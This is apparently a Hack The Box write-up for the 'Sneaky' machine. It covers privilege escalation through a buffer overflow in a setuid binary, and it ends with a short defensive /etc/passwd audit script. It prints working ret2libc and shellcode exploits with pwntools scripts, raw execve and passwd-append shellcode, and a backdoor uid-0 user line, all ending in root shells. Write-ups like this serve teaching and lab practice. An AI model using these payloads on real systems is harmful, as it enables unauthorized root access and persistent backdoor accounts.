thrasivoulos@Sneaky:/var/www/html/dev$ mysql -p -u root
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3535
Server version: 5.5.55-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dev                |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)

mysql> use dev;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+---------------+
| Tables_in_dev |
+---------------+
| users         |
+---------------+
1 row in set (0.00 sec)

mysql> select * from users;
+--------------+----------------------+
| name         | pass                 |
+--------------+----------------------+
| admin        | sup3rstr0ngp4ssf0r4d |
| thrasivoulos | sup3rstr0ngp4ssf0r4d |
+--------------+----------------------+
2 rows in set (0.00 sec)

mysql> quit
Bye
But we only find a password we no longer need.
thrasivoulos@Sneaky:/tmp$ ./LinEnum.sh
...
[-] World-writable files (excluding /proc and /sys):
-rwxrwxrwx 1 root root 0 May 4 2017 /var/crash/.lock
...
[-] SGID files:
-rwxr-sr-x 1 root shadow 30432 Mar 16 2016 /sbin/unix_chkpwd
-rwsrwsr-x 1 root root 7301 May 4 2017 /usr/local/bin/chal
-rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd
The chal binary is owned by root and has the setuid bit set.
u505@kali:~/HTB/Machines/Sneaky$ scp -i sshkeyforadministratordifficulttimes thrasivoulos@[dead:beef::0250:56ff:feb9:426f]:/usr/local/bin/chal ./
chal                                          100% 7301   174.0KB/s   00:00
Privilege escalation
This program is very simple and has an obvious buffer overflow.
Security check
thrasivoulos@Sneaky:/tmp$ ldd /usr/local/bin/chal
linux-gate.so.1 => (0xb7ffe000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e44000)
/lib/ld-linux.so.2 (0x80000000)
thrasivoulos@Sneaky:/tmp$ cat /proc/sys/kernel/randomize_va_space
0
ASLR is not enabled.
u505@kali:~/HTB/Machines/Sneaky$ checksec chal
[*] '/opt/HTB/Machines/Sneaky/chal'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
NX is disabled, so the stack is executable and the program can run code placed there.
Overflow offset
u505@kali:~/HTB/Machines/Sneaky$ gdb chal
GNU gdb (Debian 9.1-3) 9.1
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from chal...
(No debugging symbols found in chal)
(gdb) init-peda
gdb-peda$ pattern_create 400
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y'
gdb-peda$ r 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y'
Starting program: /opt/HTB/Machines/Sneaky/chal 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y'

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xffffd780 ("%YA%wA%ZA%xA%y")
EDX: 0xffffd424 ("%YA%wA%ZA%xA%y")
ESI: 0xf7fa1000 --> 0x1dfd6c
EDI: 0xf7fa1000 --> 0x1dfd6c
EBP: 0x41712541 ('A%qA')
ESP: 0xffffd410 ("rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
EIP: 0x25415525 ('%UA%')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x25415525
[------------------------------------stack-------------------------------------]
0000| 0xffffd410 ("rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0004| 0xffffd414 ("A%tA%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0008| 0xffffd418 ("%WA%uA%XA%vA%YA%wA%ZA%xA%y")
0012| 0xffffd41c ("uA%XA%vA%YA%wA%ZA%xA%y")
0016| 0xffffd420 ("A%vA%YA%wA%ZA%xA%y")
0020| 0xffffd424 ("%YA%wA%ZA%xA%y")
0024| 0xffffd428 ("wA%ZA%xA%y")
0028| 0xffffd42c ("A%xA%y")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x25415525 in ?? ()
gdb-peda$ pattern_offset 0x25415525
625038629 found at offset: 362
As expected, the saved return address is overwritten after 362 bytes.
Call system function
The first solution I tried was to call the system function from glibc (ret2libc). ASLR is not enabled, so this should be easy to apply.
thrasivoulos@Sneaky:/tmp$ ldd /usr/local/bin/chal
linux-gate.so.1 => (0xb7ffe000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e44000)
/lib/ld-linux.so.2 (0x80000000)
We have the glibc base address.
thrasivoulos@Sneaky:/tmp$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " system@@"
1443: 00040310 56 FUNC WEAK DEFAULT 12 system@@GLIBC_2.0
system function offset.
thrasivoulos@Sneaky:/tmp$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " exit@@"
139: 00033260 45 FUNC GLOBAL DEFAULT 12 exit@@GLIBC_2.0
exit function offset.
thrasivoulos@Sneaky:/tmp$ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
162bac /bin/sh
/bin/sh string offset.
u505@kali:~/HTB/Machines/Sneaky$ cat exploit_target.py
#!/usr/bin/python
from pwn import *

# 362 bytes of filler reach the saved return address (offset found with pattern_offset)
junk = b'D' * 362

# libc base from ldd on the target, symbol and string offsets from readelf/strings
glibcbase = 0xb7e44000
systemoffset = 0x00040310
exitoffset = 0x00033260
binshoffset = 0x162bac

systemaddr = glibcbase + systemoffset
exitaddr = glibcbase + exitoffset
binshaddr = glibcbase + binshoffset

log.info("systemaddr 0x%x" % systemaddr)
log.info("exitaddr 0x%x" % exitaddr)
log.info("binshaddr 0x%x" % binshaddr)

# ret2libc frame: return into system(), exit() as system's return address, "/bin/sh" as its argument
payload = junk + p32(systemaddr) + p32(exitaddr) + p32(binshaddr)

with open("payload", "wb") as f:
    f.write(payload)
The payload returns into system(), with exit() placed where system() expects its return address and the address of the "/bin/sh" string where it expects its first argument.
u505@kali:~/HTB/Machines/Sneaky$ python exploit_target.py
[*] systemaddr 0xb7e84310
[*] exitaddr 0xb7e77260
[*] binshaddr 0xb7fa6bac
We transfer the payload to the target.
u505@kali:~/HTB/Machines/Sneaky$ scp -i sshkeyforadministratordifficulttimes payload thrasivoulos@[dead:beef::0250:56ff:feb9:426f]:/tmp/
payload                                       100%  374     9.4KB/s   00:00
We try the exploit.
thrasivoulos@Sneaky:/tmp$ /usr/local/bin/chal `cat payload`
Segmentation fault (core dumped)
But it fails, so I looked for another way to find the correct addresses.
thrasivoulos@Sneaky:/tmp$ gdb /usr/local/bin/chal -q /lib/i386-linux-gnu/libc.so.6
Reading symbols from /usr/local/bin/chal...(no debugging symbols found)...done.
"/lib/i386-linux-gnu/libc.so.6" is not a core dump: File format not recognized
(gdb) disassemble main
Dump of assembler code for function main:
   0x0804841d <+0>:     push   %ebp
   0x0804841e <+1>:     mov    %esp,%ebp
   0x08048420 <+3>:     and    $0xfffffff0,%esp
   0x08048423 <+6>:     sub    $0x170,%esp
   0x08048429 <+12>:    mov    0xc(%ebp),%eax
   0x0804842c <+15>:    add    $0x4,%eax
   0x0804842f <+18>:    mov    (%eax),%eax
   0x08048431 <+20>:    mov    %eax,0x4(%esp)
   0x08048435 <+24>:    lea    0x12(%esp),%eax
   0x08048439 <+28>:    mov    %eax,(%esp)
   0x0804843c <+31>:    call   0x80482f0 <strcpy@plt>
   0x08048441 <+36>:    mov    $0x0,%eax
   0x08048446 <+41>:    leave
   0x08048447 <+42>:    ret
End of assembler dump.
(gdb) br *0x08048447
Breakpoint 1 at 0x8048447
(gdb) r `cat payload`
Starting program: /usr/local/bin/chal `cat payload`

Breakpoint 1, 0x08048447 in main ()
(gdb) print system
$1 = {<text variable, no debug info>} 0xb7e62310 <__libc_system>
(gdb) print exit
$2 = {<text variable, no debug info>} 0xb7e55260 <__GI_exit>
The system and exit addresses differ from the ones computed before, so the second script derives the libc base from the system address gdb reported instead of from ldd.
u505@kali:~/HTB/Machines/Sneaky$ cat exploit_target2.py
#!/usr/bin/python
from pwn import *

junk = b'D' * 362

# system() address as printed by gdb on the target
systemaddr = 0xb7e62310

# Same symbol/string offsets as before; the libc base is now derived from systemaddr
systemoffset = 0x00040310
exitoffset = 0x00033260
binshoffset = 0x162bac

glibcbase = systemaddr - systemoffset
exitaddr = glibcbase + exitoffset
binshaddr = glibcbase + binshoffset

log.info("glibcbase 0x%x" % glibcbase)
log.info("systemaddr 0x%x" % systemaddr)
log.info("exitaddr 0x%x" % exitaddr)
log.info("binshaddr 0x%x" % binshaddr)

payload = junk + p32(systemaddr) + p32(exitaddr) + p32(binshaddr)

with open("payload", "wb") as f:
    f.write(payload)
We compute the new payload.
u505@kali:~/HTB/Machines/Sneaky$ python exploit_target2.py
[*] glibcbase 0xb7e22000
[*] systemaddr 0xb7e62310
[*] exitaddr 0xb7e55260
[*] binshaddr 0xb7f84bac
We copy the new payload.
u505@kali:~/HTB/Machines/Sneaky$ scp -i sshkeyforadministratordifficulttimes payload thrasivoulos@[dead:beef::0250:56ff:feb9:426f]:/tmp/
payload                                       100%  374     9.5KB/s   00:00
And now it works: we get a root shell.
thrasivoulos@Sneaky:/tmp$ /usr/local/bin/chal `cat payload`
# id
uid=1000(thrasivoulos) gid=1000(thrasivoulos) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(thrasivoulos)
I don't know why the utility ldd is providing the incorrect address.
Alternative: shellcode execution
NX is disabled, so we should be able to place shellcode on the stack and jump to it.
u505@kali:~/HTB/Machines/Sneaky$ cat exploit_shellcode.py
#!/usr/bin/python
from pwn import *

# Placeholder return address, replaced once the stack has been inspected in gdb
eip = 0xdeadc0de
# 32-bit Linux execve("/bin/sh") shellcode
shellcode = b"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"

# NOP sled in front of the shellcode so that the whole buffer reaches the 362-byte offset
padding_len = 362 - len(shellcode)
payload = b'\x90' * padding_len + shellcode + p32(eip)

with open("payload", "wb") as f:
    f.write(payload)
The strategy is insert the shell code at the end of the 362 bytes, and padding on the right with No Operation instructions (NOP \x90). Because we control the EIP register, we can call our shell code on our stack. The problem is that we don't the address of the code on the stack. But gdb is installed on the target machine, so we run a first time, the payload with a work address, and analyze the stack status and extract a valid address.
u505@kali:~/HTB/Machines/Sneaky$ python exploit_shellcode.py
u505@kali:~/HTB/Machines/Sneaky$ scp -i sshkeyforadministratordifficulttimes payload thrasivoulos@[dead:beef::0250:56ff:feb9:426f]:/tmp/
payload                                       100%  366     9.3KB/s   00:00
We run it under gdb.
thrasivoulos@Sneaky:/tmp$ gdb /usr/local/bin/chal
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/local/bin/chal...(no debugging symbols found)...done.
(gdb) r `cat payload`
Starting program: /usr/local/bin/chal `cat payload`

Program received signal SIGSEGV, Segmentation fault.
0xdeadc0de in ?? ()
(gdb) x/100x $esp-400
0xbffff3f0:	0xbffff412	0x00000000	0x00000000	0x08048441
0xbffff400:	0xbffff412	0xbffff74c	0x0804821d	0xb7fffc24
0xbffff410:	0x909018fc	0x90909090	0x90909090	0x90909090
0xbffff420:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff430:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff440:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff450:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff460:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff470:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff480:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff490:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff4a0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff4b0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff4c0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff4d0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff4e0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff4f0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff500:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff510:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff520:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff530:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff540:	0x90909090	0x90909090	0x90909090	0xeb909090
0xbffff550:	0x76895e1f	0x88c03108	0x46890746	0x890bb00c
---Type <return> to continue, or q <return> to quit---
0xbffff560:	0x084e8df3	0xcd0c568d	0x89db3180	0x80cd40d8
0xbffff570:	0xffffdce8	0x69622fff	0x68732f6e	0xdeadc0de
As expected, the program crashes at 0xdeadc0de. If we look at the stack 400 bytes below the crash point, we find our NOP sled (the 0x90 bytes), followed by our shellcode, and finally our 0xdeadc0de return address. The exact stack address can vary slightly between runs, so we point EIP into the early part of the NOP sled rather than at the shellcode itself, for example at the address 0xbffff440.
u505@kali:~/HTB/Machines/Sneaky$ cat exploit_shellcode.py
#!/usr/bin/python
from pwn import *

#eip = 0xdeadc0de
eip = 0xbffff440  # lands inside the NOP sled seen in gdb
shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
padding_len = 362 - len(shellcode)
payload = '\x90' * padding_len + shellcode + p32(eip)
file = open("payload","w")
file.write(payload)
file.close()
We generate the payload, and copy it to the target.
u505@kali:~/HTB/Machines/Sneaky$ python exploit_shellcode.py
u505@kali:~/HTB/Machines/Sneaky$ scp -i sshkeyforadministratordifficulttimes payload thrasivoulos@[dead:beef::0250:56ff:feb9:426f]:/tmp/
payload                                       100%  366     9.4KB/s   00:00
From the target.
thrasivoulos@Sneaky:/tmp$ /usr/local/bin/chal `cat payload`
# id
uid=1000(thrasivoulos) gid=1000(thrasivoulos) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(thrasivoulos)
Alternative: shellcode that adds a line to /etc/passwd
Instead of spawning a shell, we can append a line to /etc/passwd. This method should also work on systems where dash drops back to the real user ID instead of keeping the effective one when the two differ, so that a spawned shell would not stay root. We take the shellcode from http://shell-storm.org/shellcode/files/shellcode-407.php and adapt it to our needs.
We generate the line for a new user u5 with the password hello.
u505@kali:~/HTB/Machines/Sneaky$ echo "u5:`openssl passwd hello`:0:0::/:/bin/sh" > etcpasswdline
u505@kali:~/HTB/Machines/Sneaky$ cat etcpasswdline
u5:LNoj5WDjudtqo:0:0::/:/bin/sh
u505@kali:~/HTB/Machines/Sneaky$ xxd etcpasswdline
00000000: 7535 3a4c 4e6f 6a35 5744 6a75 6474 716f  u5:LNoj5WDjudtqo
00000010: 3a30 3a30 3a3a 2f3a 2f62 696e 2f73 680a  :0:0::/:/bin/sh.
We adapt the shellcode so that it appends our line to /etc/passwd.
u505@kali:~/HTB/Machines/Sneaky$ cat exploit_shellroot.py
#!/usr/bin/python
from pwn import *

#eip = 0xdeadc0de
eip = 0xbffff440  # same NOP-sled address as before

# shellcode-407 with the trailing data replaced by our passwd line
shellcode = "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb\x30\xc0\x88\x43\x0b\x31\xc9\x66\xb9\x41\x04\x31\xd2\x66\xba\xa4\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x41\x01\xf9\x31\xd2\xb2\x1f\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x01\x75\x35\x3a\x4c\x4e\x6f\x6a\x35\x57\x44\x6a\x75\x64\x74\x71\x6f\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68"
padding_len = 362 - len(shellcode)
payload = '\x90' * padding_len + shellcode + p32(eip)
file = open("payload","w")
file.write(payload)
file.close()
We generate the payload.
u505@kali:~/HTB/Machines/Sneaky$ python exploit_shellroot.py
u505@kali:~/HTB/Machines/Sneaky$ xxd payload
00000000: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000010: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000020: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000030: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000040: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000050: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000060: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000070: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000080: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000090: 9090 9090 9090 9090 9090 9090 9090 9090  ................
000000a0: 9090 9090 9090 9090 9090 9090 9090 9090  ................
000000b0: 9090 9090 9090 9090 9090 9090 9090 9090  ................
000000c0: 9090 9090 9090 9090 9090 9090 9090 9090  ................
000000d0: 9090 9090 9090 9090 9090 9090 9090 9090  ................
000000e0: 9090 9090 9090 9090 9090 9090 9090 9090  ................
000000f0: 9090 9090 9090 9090 9090 9090 9090 9090  ................
00000100: eb03 5feb 05e8 f8ff ffff 31db b335 01fb  .._.......1..5..
00000110: 30c0 8843 0b31 c966 b941 0431 d266 baa4  0..C.1.f.A.1.f..
00000120: 0131 c0b0 05cd 8089 c331 c9b1 4101 f931  .1.......1..A..1
00000130: d2b2 1f31 c0b0 04cd 8031 c0b0 01cd 802f  ...1.....1...../
00000140: 6574 632f 7061 7373 7764 0175 353a 4c4e  etc/passwd.u5:LN
00000150: 6f6a 3557 446a 7564 7471 6f3a 303a 303a  oj5WDjudtqo:0:0:
00000160: 3a2f 3a2f 6269 6e2f 7368 40f4 ffbf       :/:/bin/sh@...
We transfer the payload to the target machine.
u505@kali:~/HTB/Machines/Sneaky$ scp -i sshkeyforadministratordifficulttimes payload thrasivoulos@[dead:beef::0250:56ff:feb9:426f]:/tmp/
On the target machine, this is the end of the passwd file before running the exploit.
thrasivoulos@Sneaky:/tmp$ tail /etc/passwd
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
thrasivoulos:x:1000:1000:thrasivoulos,,,:/home/thrasivoulos:/bin/bash
snmp:x:105:113::/var/lib/snmp:/bin/false
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
Execution of the exploit.
thrasivoulos@Sneaky:/tmp$ /usr/local/bin/chal `cat payload`
Our line has been appended to the passwd file.
thrasivoulos@Sneaky:/tmp$ tail /etc/passwd
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
thrasivoulos:x:1000:1000:thrasivoulos,,,:/home/thrasivoulos:/bin/bash
snmp:x:105:113::/var/lib/snmp:/bin/false
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
u5:LNoj5WDjudtqo:0:0::/:/bin/sh
Now we can su to the user we created, with the password we know.
thrasivoulos@Sneaky:/tmp$ su - u5
Password:
# id
uid=0(root) gid=0(root) groups=0(root)
# bash
root@Sneaky:/# id
uid=0(root) gid=0(root) groups=0(root)
Our user is a real root user (uid 0), so we can even launch a bash session.
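From the defender's side, the entry this leaves behind is easy to spot: a second uid-0 account whose password hash sits in passwd itself rather than in /etc/shadow. The following audit is an added example, not part of the write-up; the sample lines are constructed from the tail shown above, and it needs only the Python standard library.

```python
import sys


def passwd_findings(text):
    """Return a list of (username, reason) for suspicious /etc/passwd entries."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "line %d does not have 7 fields" % n))
            continue
        name, pw, uid, gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            findings.append((name, "non-numeric uid %r" % uid))
            continue
        if int(uid) == 0 and name != "root":
            findings.append((name, "uid 0 account other than root"))
        if pw == "":
            findings.append((name, "empty password field (no password needed)"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # anything else is a real hash kept in world-readable passwd
            findings.append((name, "password hash stored in passwd, not shadow"))
    return findings


# Constructed sample: the tail of the file as shown on the page, plus the appended line.
SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
thrasivoulos:x:1000:1000:thrasivoulos,,,:/home/thrasivoulos:/bin/bash
snmp:x:105:113::/var/lib/snmp:/bin/false
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
u5:LNoj5WDjudtqo:0:0::/:/bin/sh"""


if __name__ == "__main__":
    # python3 passwd_audit.py /etc/passwd, or no argument to run on the sample
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    for name, reason in passwd_findings(data):
        print("%s: %s" % (name, reason))
```

Pairing this with file-integrity monitoring on /etc/passwd (and auditd on writes to it by setuid binaries) catches the technique regardless of which shellcode delivered it.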
Root Flag
# cat /root/root.txt
<ROOT_FLAG>
References
- nnamon, Linux exploitation course, lesson 4: classic exploitation, https://github.com/nnamon/linux-exploitation-course/blob/master/lessons/4_classic_exploitation/lessonplan.md
- Aleph One, Smashing The Stack For Fun And Profit
- Shell-storm shellcode database, http://shell-storm.org/shellcode/
Daniel Simao 09:36, 3 May 2020 (EDT)